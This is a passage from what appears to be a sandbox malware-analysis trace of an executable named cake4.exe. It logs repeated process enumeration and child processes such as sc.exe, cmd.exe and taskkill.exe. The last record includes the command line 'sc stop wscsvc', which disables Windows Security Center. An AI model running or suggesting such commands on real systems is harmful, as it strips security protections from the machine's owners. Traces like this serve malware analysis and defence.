th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0056.371] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0056.373] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0056.374] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0056.375] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="map enquiries.exe")) returned 1 [0056.376] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scenic.exe")) returned 1 [0056.377] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="rider.exe")) returned 1 [0056.378] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.379] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.380] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0056.381] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.382] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.383] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cake4.exe")) returned 1 [0056.384] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.385] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.386] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.387] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.388] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.389] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0056.390] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.391] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.392] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.392] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.393] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.394] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.395] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.396] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.397] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.398] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.399] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.400] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.401] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.402] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.402] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.403] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.404] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.405] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.406] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.406] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskkill.exe")) returned 1 [0056.407] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.408] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.409] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.410] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.411] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0056.412] CloseHandle (hObject=0x140) returned 1 [0056.412] GetCurrentThread () returned 0xfffffffe [0056.412] WaitForSingleObject (hHandle=0xfffffffe, dwMilliseconds=0x64) returned 0x102 [0056.654] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x140 [0056.660] Process32FirstW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0056.661] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0056.662] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0056.662] Process32NextW (in: hSnapshot=0x140, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.076] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0057.082] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.417] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0057.423] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.803] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0057.812] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.051] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0058.057] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.285] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0058.289] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0058.507] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.706] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0058.715] Process32FirstW (in: hSnapshot=0x170, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0058.927] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x16c [0062.034] Process32FirstW (in: hSnapshot=0x16c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0062.534] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0062.539] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x250 [0063.198] Process32FirstW (in: hSnapshot=0x250, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0064.324] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0064.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0064.748] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.221] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0065.228] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.769] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0065.776] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0065.975] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0065.980] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.151] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0066.155] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0066.325] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0066.543] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.724] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0066.729] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0066.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12c [0066.901] Process32FirstW (in: hSnapshot=0x12c, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0077.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0077.673] Process32FirstW (in: hSnapshot=0x120, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0078.199] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0078.205] Process32FirstW (in: hSnapshot=0x120, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0079.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0079.251] Process32FirstW (in: hSnapshot=0x120, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0080.938] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0080.948] Process32FirstW (in: hSnapshot=0x120, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0081.943] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x120 [0081.952] Process32FirstW (in: hSnapshot=0x120, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0083.628] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x124 [0083.718] Process32FirstW (in: hSnapshot=0x124, lppe=0x39f5bc | out: lppe=0x39f5bc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 18 os_tid = 0xa80 Thread: id = 25 os_tid = 0xaec Thread: id = 26 os_tid = 0xadc Thread: id = 27 os_tid = 0xae4 Process: id = "2" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x447d2000" os_pid = "0x434" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "sc stop wscsvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT 